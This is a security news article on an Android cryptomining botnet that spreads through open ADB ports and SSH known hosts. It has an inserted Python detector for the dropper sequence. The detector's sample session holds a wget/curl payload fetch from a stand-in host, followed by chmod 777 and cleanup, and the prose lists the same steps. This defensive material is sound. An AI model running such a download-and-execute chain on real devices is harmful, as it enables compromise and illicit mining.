A new botnet is making the rounds by abusing Android Debug Bridge (ADB) and SSH to enslave new Android devices to its network.
The botnet malware, as observed by Trend Micro, has spread to 21 countries and is currently most prevalent in South Korea.
While many Android devices ship with the ADB developer function and command-line tool disabled by default, since it is used to debug apps and is not a feature the average Android user requires, some devices do ship with it enabled, which may open smartphones and tablets up to exploitation.
The researchers say that the botnet, which specializes in cryptocurrency mining, abuses the fact that open ADB ports do not have authentication imposed as a default setting. Given an open door to walk through, in a way similar to the Satori botnet, the new malware will spread from the infected host to any vulnerable system which has previously shared an SSH connection.
At the beginning of the infection chain, the IP address 45[.]67[.]14[.]179 connects to a device running ADB and uses the ADB command shell to change the system's working directory to "/data/local/tmp." This modification is based on the fact that .tmp files often have default execution permissions.
The botnet will then perform a series of scans and will analyze whether the target system is a honeypot or not -- an indication security researchers are waiting in the wings to reverse-engineer the threat -- as well as to determine what kind of operating system is in place.
A command, wget, is then launched to download the malware payload. If wget fails, curl is used. An additional command, chmod 777 a.sh, is executed to change the permission settings of the malicious payload, and then further commands are run to remove traces of the malware's dropper.
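For defenders who collect shell command logs from Android or IoT devices, the sequence described above can be matched as an ordered chain rather than as single keywords. The following is an added example, not code from Trend Micro or this article; the function names, the regular expressions, the log lines, and the example.invalid host are all constructed assumptions.

```python
import re

# Stages of the dropper sequence, in the order the article describes them.
# The patterns are heuristic assumptions, not signatures from the researchers.
STAGES = [
    ("workdir",  re.compile(r"\bcd\s+/data/local/tmp\b")),
    ("download", re.compile(r"\b(wget|curl)\b.*\bhttps?://")),
    ("chmod",    re.compile(r"\bchmod\s+(\+x|0?777)\s+\S+")),
    ("cleanup",  re.compile(r"\brm\s+(-\w+\s+)*\S+")),
]

def split_commands(line):
    """Split one logged shell line on ;, && and || so chained commands are checked separately."""
    return [c.strip() for c in re.split(r";|&&|\|\|", line) if c.strip()]

def match_stages(lines):
    """Return the stage names matched, in order, across one session's logged lines."""
    matched, idx = [], 0
    for line in lines:
        for cmd in split_commands(line):
            # Only the next expected stage is tested, so an 'rm' that happens
            # before any download or chmod does not count as dropper cleanup.
            if idx < len(STAGES) and STAGES[idx][1].search(cmd):
                matched.append(STAGES[idx][0])
                idx += 1
    return matched

def is_dropper_like(lines, threshold=3):
    """Flag a session when at least `threshold` stages occur in the expected order."""
    return len(match_stages(lines)) >= threshold

# Constructed sample sessions (not real telemetry).
SUSPECT = [
    "cd /data/local/tmp; wget http://example.invalid/a.sh || curl -O http://example.invalid/a.sh",
    "chmod 777 a.sh",
    "rm -f a.sh",
]
BENIGN = [  # a developer installing and removing a debug build
    "cd /data/local/tmp",
    "ls -l",
    "pm install app-debug.apk",
    "rm app-debug.apk",
]

if __name__ == "__main__":
    for name, session in (("suspect", SUSPECT), ("benign", BENIGN)):
        print(name, match_stages(session), is_dropper_like(session))
```

Requiring the stages in order keeps ordinary developer activity in /data/local/tmp from triggering the rule, at the cost of missing a chain that is split across sessions.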
The payload itself, once pulled from the attacker's server, allows the botnet to select one of three potential miners depending on the victim system's manufacturer, architecture, processor type, and hardware.
All three miners are hosted on the same domain.
An interesting feature of the malware is the ability to enable HugePages to boost the system's capacity to support pages larger than those usually permitted by default. Doing so can potentially ramp up how much illicit cryptocurrency mining can be performed.
In addition, the malware will modify the device's hosts file to block competing miners.
The propagation system the botnet uses is nothing new but can be difficult to prevent. The malware spreads through SSH and, according to Trend Micro, "any system that has connected to the original victim being attacked via SSH is likely to have been listed as a 'known' device on its operating system."
This may include other mobile devices or Internet of Things (IoT) products.
"Being a known device means the two systems can communicate with each other without any further authentication after the initial key exchange, each system considers the other as safe," the researchers say. "The presence of a spreading mechanism may mean that this malware can abuse the widely used process of making SSH connections."
After the installation has completed and a miner is hard at work, the malware will attempt to spread to other devices and will also continue to delete its payloads in an attempt to fly under the radar.
The threat of mobile malware has been steadily growing and threat actors are constantly evolving their techniques to compromise our devices.
In recent weeks another cyberattack group, known as Outlaw, was spotted spreading a cryptocurrency mining botnet across China through brute-force attacks against servers. However, an examination of the malware's code revealed an as-of-yet unused Android APK which may suggest Android devices will be on the botnet's target list in the future.